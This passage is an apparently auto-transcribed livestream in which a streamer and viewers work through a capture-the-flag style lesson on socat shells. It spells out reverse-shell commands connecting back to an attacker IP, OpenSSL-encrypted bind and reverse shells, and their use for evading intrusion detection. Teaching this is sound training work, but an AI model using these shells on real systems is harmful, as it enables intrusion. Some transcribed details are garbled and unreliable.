just sending information and it's doing all the things for me. When direct access to target IP address is possible, and the target is listening in this case, right? This was earlier on the attacker machine. An attacker connects. So opposite, basically, in this case. Local network penetration testing, legacy system without egress filtering. Egress is basically, I believe, ingress and egress. Egress is external, where the connection is going to. Okay, sounds good. Thank you. That's a good question. Thank you for asking. And ingress and egress, if nobody people don't know, you will see it in DevOps used a lot with Kubernetes. Data entering in, out, or exiting, egress. Okay, I will even come up with a better, a better example. Let's say, if possible, I'll think more a better example. Where are we? Okay, here. We use pipes argument to interface between Unix and Windows ways of handling input and output. Oh, we were here. Yeah, we were here. Let's break this command down into its two parts. As usual, so we are talking about the netcat, listener, TTY. As usual, we are connecting 2 points together. In the first, in this case, 2 points are a listening port and a file. Especially, we are passing in the current TTY as a file and setting the echo to be 0. Echo 0, basically our shell, we won't be like, our shell won't be giving its own. Like if we do who am I, it will be the target machine answer we will be getting, not our own. This is approximately equivalent to Control Z and STTY raw echo and foreground. Trick with the net shell command, with the netcat shell, with the added bonus of being immediately stable and hooking into a fully TTY. The first listener can be connected to with any payload. However, this special listener must be activated with a specific socat command. This means that the target must have socat installed. Most machines do not have socat installed by default. However, it is possible to upload a pre-compiled socat binary which can be executed as normal. So basically what is saying, the first listener, basically the server, with any payload we can connect to it, right? Or basically we can send it. The second special listener, can be connected to with any payload. However, the special listener must be active with a specific socat command. This means that the target must have socat installed. So basically we are going to install, like the HTTP server we were talking about, do not have socat installed by default. However, it's possible to upload a pre-compiled socat binary which can be executed as normal. My question, I think, to you guys, right? I'm not sure if you guys know this, but if socat is more stable, more powerful, and even if it is only when it comes to weakness, it's same level weak as netcat, why it's not available everywhere? Why it's not talked about more? Do you think Reddit might have an answer? Okay, I'm in the process of writing a script to fixNology's broken OpenVPN server implementation. Why call them banned? They simply chose not to add these external tools to proprietary distros. Both socat and netcat should be available via and where. This by two versatile socket-based networking command lines. While socat is more advanced and versatile, data stream redirection. I don't get the answer. Okay, let's see. Socat has all the benefits of netcat and also provide more stable shells. Then why it is not available and talked about compared to netcat? Socat is indeed more powerful and provide more stable and feature-rich shells than netcat, especially for reverse shells that need a true terminal experience. However, socat is less commonly available and discussed compared to netcat for several practical reasons. Default availability: netcat is installed by default on all Linux distros. Rarely installed by default. Most systems do not include socat out of the box, so you must upload and install before use. Convenient during penetration. This is, I don't understand. Okay, netcat has a simple, easy to remember syntax. More complex, use covers most basic needs: reverse shell, bind shells, Port scanning, banners, grabbing with minimal commands, making it a go-to tool. Shines in advanced scenarios, encrypted shells, true TTLY. Okay. So basically, just because people talk less about it, that's why it's not there. But why people talk less about it? Do you guys know answer to this? Do you guys think that's actually a valid question to ask even? I don't get it. Why it is not, if it is so powerful. It's almost same like, feels like a case of like Explorer versus Netscape case. It looks like a same case to me. Like it's being forced when Netscape is better. Is being Explorer is being forced on others, right? Do you guys remember this story, Explorer versus Netscape, and like how Bill Gates at this point is saying bad things about Elon Musk and stuff, but like he actually was one of the most evil person in business at his time. I just don't understand. Okay, the special command is as follows. SOCAT TCP, so not listener, TCP, IP address of attacker, port, execute bash li, pty, standard error, SIGINT, and set SID and sane. Okay. What just happened? This is a handful, so let's break it down. The first part is easy. We are linking up with the listener running on our own machine. The second part of the command creates an interactive bash session with execute bash li. We are also passing the arguments pty, standard error, SIGINT, set id, and sane. Pty allocates a pseudo terminal on the target, part of stabilization process. Okay, same, I think pseudo terminal was done before as well with the bash command we had before in part 1, right? This one, pty sudo, okay, that's what they are doing. Standard, make sure that any error messages get shown in the shell, often a problem with non-interactive shells. SIGINT passes any control plus C commands through into the sub process, allowing us to kill commands inside the shell, so inside the target's shell, not R1, because if you do anything, right, like just to give you guys an example, let's say we are talking about this one, right? We saw this yesterday. This is going to run, so only way to stop, this is a process running right now. Way to stop, control C, get out. So control C stops those processes. So that it doesn't happen in our terminal, only on the person's terminal. That's interesting. Set SID. So set SID, sudo ID, creates the process in a new session. That's what it is, right? Sets the process group ID, right? Like I was right, okay. Set session ID, I believe, right? New session if the calling process is not process ground level in the leader of the new session. The calling process also becomes the process group leader of the new process group in the session. The calling process, blah, blah, blah. Okay. Sane. I've never heard of this. Stabilizes the terminal, attempting to normalize it. That's a lot to take in, so let's see it in action. As a normal on the left, we have as normal we have on the left the listener running on the local attacking machine. On the right, we have simulation of a compromised target running with a non-interactive shell. Using the non-interactive netcat shell, we execute the special SOCAT command and receive a fully interactive bash shell on the SOCAT listener to the left. Okay. Non-interactive using. Okay, so let's see. First, we have a sudo socat listener with tty raw. Who am I? It's listening on port 443. Listening connect. Who am I? Shell. SSH shell at localhost. Socat TCP execute. Okay. Bash lip diy. Okay, one second. I need to understand what exactly this happens. Do you guys understand it? I'm actually lost. My bad. Listener running on the local attacking machine. On the right, we have simulation of the compromised target running on a non-interactive shell. Okay, using a non-interactive netcat shell, we execute the special socat command and receive a fully interactive bash shell. Okay, so basically this one was ran on the left one. This socat was actually ran on the right, not on the left. And that's how we get the whole SSH shell, localhost and everything. Okay. Note that the socat shell is fully interactive, allowing us to use interactive commands such as SSH, because in usually SSH you won't be able to see these things, right? Like what, yes, and all those things. If at any point a socat shell is not working correctly, it's well worth increasing the verbosity by adding -d into the command. This is very useful for experimental purposes, but is not usually necessary for journal purposes. Okay. How would we get socat to listen on TCP port? Just want to make sure. Okay. So how would we get socat to listen on TCP port 8080? TCP-L:8080. Okay, good. I'm learning a little bit. Okay. Socat encrypted. Okay, let's cover this as well today. Do you guys want to cover this today or tomorrow? What's your call? If you want, we can cover this today. This one will be about encrypted shell, which is very useful. I will say this because other things were like open. Everybody can see the data. If let's say somebody catches your shell, they can see what's going on. But with encrypted, it won't be possible to see, right? So let's cover it. Give me a thumbs up if you want me to cover this. What's your call? Dhaval, what's up, brother? No worries. How are you doing, my man? So everyone, this is Dhaval. He is the one in the Discord sent me all the important information. Let me share with you. Was it in just chatting or journal chat, right? He sent me all the important ones which he thinks are good for Linux privilege. Good, bro. Good. Thank you. So, if you are here, right, let's cover our encrypted shell. Let's do that. How about? So, one of the many great things about socat is that it's capable of creating encrypted shells. Both bind, connect, bro, in X. Oh, yes. Sorry, I forgot. My apologies. Let's do that right now. X.com, I guess. My apologies, bro. My brain is... Oh, did I get anything missed? Double, yes. 100%. Let's connect more. Sorry, my brain... yesterday I was so tired. Today too, I was having such a bad headache before starting. But thanks to you guys, now it's better. Okay. So you're ready to get into encrypted shells, ladies and gentlemen? Double, Krish, everyone ready? Let's do it. One of the many great things about socat is that it's capable of creating encrypted shells, both bind and reverse. Why would we want to do this? Encrypted shells cannot be spied on unless you have the decryption key and are often able to bypass an IDS as a result. IDS is intrusion detection system, right? Intrusion detection system is basically what it does. You have many servers, right? You have like 400 servers. All of them go through basically, let's say, or like you have 4 servers, all of them go through a load balancer, or basically load balancer. Why? Because load balancer is balancing, sending all the traffic to you guys. There are different type of load balancer. We are just going to go for just saying it's load balancer. Right? Now, even things going out of it also goes through load balancer. That's how a lot of time is set up, right? And which is a good one. So goes through these, right? And because some of these load balancer have a special feature of IDS and IPS. In India, the IPS means something different. This IPS means intrusion prevention system, and this one is intrusion detection system. A good idea, I think a very awesome project if you want to look into of IDS is Snort. We will take care of, Snort is going to come with the Linux privilege after this. Amazing, written in I think C, C++. Amazing software. Just if you want to go a bit deep and look what great. And Snort is used by Microsoft and Apple and big companies like NASA stuff, or organizations like NASA. So what it is saying, what IDS and IPS does is like, if they are looking at your stuff, right? They are looking at these whole system, this interaction that's going on, they're analyzing it. But they can only analyze when they can see what is going on, right? They can see, okay, there is a SSH or some portal going or some kind of network going through. But if you have encrypted, then they cannot see and they cannot detect if something wrong is going on. You are asking for any certain commands or anything. And that's what SOCAT's benefit is. That's like a whole thing with this connection to HTTPS, right? Because man in the middle attack doesn't happen because their system is encrypted, and it's very, very big. And if you want, this is sorry, I'm taking this time because I think so much information, so many people's life and so many people's job is in this area, right? And I will give you one beautiful DigiNotar, I think that was the company. Yeah, defunct in 2011. Overview. On September 3rd, 2011, after it had become clear that the security breach has resulted in fraudulent issuing of certificates, the HTTPS certificates, these one. Certificate is valid, right? These ones. The Dutch government took over operational management of DigiNotar. That same month, the company was declared bankrupt because nobody was going through them after that. Nobody. And the company, because when you get these certificates, right, there is a list of companies which issue these certificates, right? And DigiNotar was one of them, trusted ones. But after their breach, nobody trusted them. A 12-year-old company gone within a day after this breach came out. And if you want to go, I think Darknet Diaries has a beautiful one on it. Episode 3. You are the weakest link. Goodbye. So I'll post this. If you are into cybersecurity, and especially Gaurav, you were mentioning, right? Like this one is, I think you will love this podcast. And everyone here, if you are into hacking, you like to go for walk, just take this and go for this. This is an amazing one. Amazing podcast. Yeah, it's super nice, man. Super nice. The guy's ability to deliver information is amazing. Top notch. Okay, let's get back into encryption. I got some more message. What's that? Oh yeah, my favorite too. How much experience do you have in regards of Linux kernels? That's a good question. I will say at least like my Linux journey started like when I was in university, right? So 7 years, 8 years, but in last 2 years, I will say I have been going a lot into like learning about C groups, learning about like how to say it. Basically, if you use CPU, right? There are rings inside it. Rings means like level of privileges. So understanding those, just looking at some people's research, so that has been going on for like a year and a half or 2 years. So like advanced level stuff, year and a half. Linux Touch, 7 years. So hopefully that helps. And if you guys don't know, rings, that's a very advanced, and C groups is a very advanced topic too. I think C groups was introduced by somebody at Google. Yeah, C groups V2. That was Kubernetes is by Google. They did it because they wanted to have 2007. Yeah. Look into this. Amazing stuff. Engineers at Google started the work because they wanted to create certain processes. Amazing stuff. C group is amazing. And then rings in kernel Linux. Ring 0, there are 4, but actually there are not 4. This guy did research and he found there are 3 more rings, -1, -2, -3, if I'm not wrong. So rings, if you learn about these type of topics, you will see the world differently. I will say these are one of those topics. Damon, so hopefully that helps. Kind of with the answers. Yeah, and hopefully you guys are ready to go into encryption. Let's do that. Does that help though, Demon? Please let me know. And let's do this. We covered how to create basic shells in the previous task. So that syntax will be covered again here. Suffice to say that anytime TCP was used, my mic is very near, so I'll reduce my sensitivity a bit. Suffice to say that anytime TCP was used as part of the command, this would be replaced with OpenSSL when working with encrypted shells. We'll cover a few examples. Sorry, what's that message? Thank you. Yeah, I got quite a bit of experience using Linux, around 8 years like yourself, but specialize in kernels and drivers development primarily. Oh, yo, if possible, can you join the Discord? I would love to talk more about this. If you're doing kernel development, that's amazing, man. Let's chat more about this. ACPI. Computer hardware components to perform. Oh, wow. That's big. That's the one you were working for, right? ACPI. That's cool, bro. That's super cool. Sorry, what's the... Let me say. Sure, I can join. I'm working on UTP protocol for BitTorrent right now, but sure. Oh, nice. That's amazing, man. Thank you for working for BitTorrent. Very useful thing. In certain ways, very useful. And you guys can hear me, right? If I reduce, once I reduce my sensitivity, it's not that bad, right? What's that? Let's see. There is a lag here. Username is TrySalam. Oh, okay, sounds good. We'll love to chat. Hell yeah. Okay. So let's get going in this, right? Hopefully, if you cannot hear me or you think my voice like I should reduce or decrease, increase or reduce, let me know. Suffice to say, TCP was used as part of a command which would be replaced by OpenSSL. So instead of TCP-L, we will have OpenSSL-L when working with encrypted shells. We will cover a few examples at the end of the task, but first, let's talk about certificates. One sec, let me drink some water. Q. We first need to generate a certificate in order to see encrypted shells. This is the easiest way to do our attacking machine. So OpenSSL, it's a lot of time already installed in your system. Requesting new key RSA 2048 nodes key out shell.key x509 days 392. So for how long it should be valid out shell dot. So basically OpenSSL will create a certificate and it will be named shell certificate. And let's do it. I'll show you what it looks like. And you might have seen it if you are using SSH with certain what's it called? Sorry, certain machines. You will see it. You would have seen it. Oh, didn't get copied, I guess. Copy. So I'm just typing the name as Canada CA, right? Name or province name. I'll just leave outside locality, not telling that. Company, I will say censored hacker. This is information when you are creating a certificate, so useful if somebody wants to check your certificate. CNAME, no, nothing. Email address, no, nothing. So if you see a key is generated, a cert is generated. Let's cat both. Or let's do this way. So this key and this is the certificate. Begin certificate, end certificate. Important note, a very important note. This line and this line are very important. If you don't think it is important, let me tell you it's very important. Same with the key. Especially if you are like in DevOps or if you are like in networking, right? You are setting up your website like I did my Hackers Pub. I have to upload these two with proper amount of spaces and proper amount of dashes. So this is how the key and certificate looks. And if somebody has the key, they can I can see all your data with the encrypted shell if I see this key. Okay. So this is called a self-assigned certificate because I am myself creating this one. A lot of time you can go to big companies. There is, I think, OpenCert and all those. You can do that. Self-assigned and valid for just under a year, 362. When you run this command, it will ask you to fill in information about the certificates. This can be left blank or filled randomly. We then need to merge the two created files into a single PEM file. So how we do that? Key cert, basically cat. Have you ever done this like work? Do you guys understand what I'm doing? First is cert or key? Key, right? Okay. Shell. So now we have another file, PEM, right? Basically put into one. Simple. Yeah, I've noticed, I've worked with the PKI. Oh, nice. That's good, that's good. Good to know. Noise. Have you seen that? Noise. That meme. Same thing here. Now set up the reverse shell listener we use. So cat OpenSSL reverse shell, basically because listening on our side. Port cert, we are going to give our PEM key. It has the key and the certificate. Verify 0-D. So this sets up an OpenSSL listener using our generated certificate. Verify equals 0. Tells the connection to not bother trying to validate our certificate. Has been properly signed by a recognized authority, us. Please note that the certificate must be used on whichever device is listening. To connect back, we would use OpenSSL this verify 0 bin bash. The same technique would apply for the bind shells, basically on the target. This one This time here, this is the target. This we are listening on here because this is reverse shell. Bind shell, listening on the target, right? With the listen, port, certificate, pem file, verify 0, do not verify, it's already good. Execute command.exe, command prompt, and pipes for Linux. SOCAT, OpenSSL, target IP, target port, verify 0 dash. Again, note that even for a Windows target, the certificate must be used with the listener. So copying the PEM file across for a bind shell is required. The following image shows OpenSSL reverse shell on a Linux target. As usual, the target is on the right and the attacker is on the left. So this is our attacker, right, on the left here. This is our attacker. So OpenSSL, we created the file, blah, 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 cat, encrypt key. This is what we did. Let me make sure. This is what we have done. Now, next is SOCAT, OpenSSL. We are listening because this is reverse shell, listening on our side. Krish, hopefully this is helpful, right? Because now on the reverse shell, we are listening. We have given our UID, user ID, group ID, groups. And who am I? www data, ID, and stuff. We started that, and here already we have the listener command set up. But remember, listener is a alias created on this, won't work for you unless until you set it up. So once you have the shell, you use this command: SOCAT OpenSSL verify 0 bin bash. Hopefully this is helpful, right? And soon we will be covering, right, this with this. And I promise you one thing, Krish, do DM me. I will look into tonight, because this is the last task we are doing. I'll do look more into a better example with some, let's say, some actual real life attack that has happened with bind or reverse, and I will try to come up with that tomorrow, hopefully. And I will send it to you, the information too, personally. You are in the Discord, right? This technique will, let me know, right? Just DM me on Discord. I will love to. This technique will also work. Oh, sweet. Don't call me sir, bro. Like, I'm not a big guy at all. And I don't deserve that much respect. I'm a dummy dum-dum sometimes. This technique awesome. This technique will also work with the special Linux only TTY shell covered in the previous task. Figuring out the syntax of this will be challenging for this task. Feel free to use the Linux practice box deployable at the end of the room to experiment if you are struggling to obtain the answer. So what we can do, an interesting thing I just thought of, I can create a really quick Python file for you guys and send it up in GitHub, which will help you, like, what is the target machine distro, right? Linux or Windows. What is your machine one? And then what type you want: OpenSSL, listener, bind, reverse shell, all those. And like based on that, you can practice. So I can probably do that. It'll be a fun one to do. Over the weekend, I will try to do that for you guys. What is the syntax for setting up OpenSSL listener using the TTY technique on the previous task? Use the port 53 and a PEM file called encrypt.pemy. Okay, we need to do this here itself. And if your IP is this, what syntax would you use to connect back to the listener? Holy. Okay, let's do this. From your side, type it. So let's see, we can get this. OpenSSL -L listen colon TTY technique PEM file port 53. So we type the port, then comma, then what was it? Cert? No, not cert. File equals .pem comma verify equals 0. What is next? Execute cmd d.ex, no. I think it is exec, right? What should be next after this, lads? bash/bash, comma. What should be there, lads? I am kind of confused. Please help me. Socat, let's look through the man files then, if we have Socat already installed. Socat OpenSSL. I think this one, and then we have file equals. I think for now here we will do shell.key or shell.pem. Unknown option file. So cert, okay. Cert, my bad. Certificate is spam file, help. What else is it? Should we look for the answer above, or should we make should we wait and look? Okay, let's look above. What is it? Socat OpenSSL listen 53 cert pem file verify dash, no, that's different. Pipes. Cert shell verify 0 execute command.exe. Raw echo. Yes. Oh, amazing. I think its problem is, oh, not file, cert. And execute should be like, I think, stdy. Oh no, not cmd. No. Not cmd. tty, stty. Previous task, so stty should be maybe somewhere. Oh, this tty and file tty. Okay, need to look into this. Remembering. Panda, what's up? I do have a lot of work on my hand. Yes, this is technically my time for work meeting, but it's okay, I guess. I'm with my boys. Yep, I do usually have my meeting during that time. But I forgot. I didn't even look at the time. I was just enjoying so much with the boys. So, okay, let's see this. Socat, we have open SSL listen. And I want to complete this task. I was like, because tomorrow if I come back to this task, I won't be able to have my brain. Cert encrypt .pem, comma. And if you guys don't know what was happening, I have Panda here talking to me. PEM, encrypt PEM. What next is there? After PEM, verify equals 0. Then we have file colon dash, because this is TTY compared to executing something, right? TTY raw echo 0. Let's go. Oh, attaboy. SOCAT OpenSSL 53 cert PEM verify 0 file. Yes, just it should be like dash. That's what we were missing with those, right? But amazing, you got it right, buddy. Thank you, lads, for the help. And let's say if your IP is this, what is the syntax that you should use to connect back to this listener? This one is again good. Open SSL, right? Then we type our IP 10.10.10.5 colon 53. I think here also we have cert. Okay, hold up. I don't remember this one at all. SOCAT IP verify equals 0. Okay, and then we have execute and has 4 options. I think last was sane, before that was SUID. Here, what were the 2 more things? Okay, let's look at our notes. Do you guys remember this? This one requires some brain power needed. Oh, it was like this. Bash li, not here, pty second set id and then sane. Holy. Alright, and then I'll just send you guys this thing so you guys can practice. But good work. Thank you so much, Daman. Thank you, Krish, for helping with the answers. And yeah, let's end the session today. Hopefully, good catching up. Tomorrow is great because tomorrow is Friday. Your guys will be probably, some people will have it Sunday morning, Saturday morning. So tomorrow we can cover a lot because, thank you so much for the follow, bro. Yo, what's up? Thanks for the follow, bro. Luvises, how you doing? So, as I was mentioning, right, tomorrow will be big because on Friday I don't have any meetings or anything to catch up on, right? So, we will cover command shell payloads. One for sure thing we will be doing is actually like going, have a good night, bro. But let's see this. So Linux practice box, right? What we will do, I will have the shells and all the commands ready. We will try to like hack and get the reverse shell, bind shells with this. Just practice some SOCAT first, and common shell payloads. This is what we'll do after. If you guys, however, what do you guys want? Do you want to cover some material first and then practice? Or do you want to just practice what we learned today, tomorrow? What do you want to do? Let me know the answer because however you guys like, I will love to cover that exact way. So please let me know. One sec. Okay. Yeah. So practice. Okay. Sounds good. We'll do practice then. And I will start a bit late tomorrow. Usually I start around like my 7 p.m. PST. Tomorrow I can start around like, let's say, 1 hour late, around 8 p.m. PST, because then you guys will be up. Saturday should be, you can relax a bit, right? And what is the time right now in IST? Let's see. 9:46 minus 9:15. So it will be like around your 8:30 in the morning, right? You will be up, ready to do some hacking. Ready to do some hacking, and then we'll practice all the commands first. I think we'll practice just socat, netshell, netcat, all these things we'll practice, and then we will be able to cover still task 8. So that'll be amazing. So let's do that. And next week we'll take care of the MSF Venom, Metasploit, and web shells and all those. Alrighty. Does that sound good? Like, is that a good one? Right? You guys happy with that? And right? Sounds goody good. Okay. Bye. Alrighty. Buyer, big buyer. And then I'll just, on Twitch, I'll just start my ad. Helps me pay bills, right? Oh, thank you so much, bro. Thank you so much. Means a lot. Thank you. And then, oh, amazing. Thank you. This is going to be good then. Tomorrow will be good. And then I'll just start my ad on Twitch. On YouTube, I'll disconnect, but feel free to join the Discord, right? Basically everything is, you guys can talk to me and do whatever you like on Discord. We can even play games. Like, I don't know if you are part of Marvel Rivals, Fortnite, and chess.com or Rocket League. Somebody mentioned Rocket League recently. So if you guys are down, I would love to just hang out in Discord even on the weekend. But till then, thank you so much. Have a great weekend. I only play Mobile Legend. Oh, okay. We can I can look into that. My phone is very old, so I don't know if I can play, but we'll look. And we will be doing some competitive programming, so that'll be fun. Yeah. And with that being said, thank you everyone for joining. Right, I'll be disconnecting from YouTube, but Twitch will be open, so I can do that. But till then, like usual, right? Just as Double said, 3, 2, 1, bye. Bye everyone. Have a good night. Have a great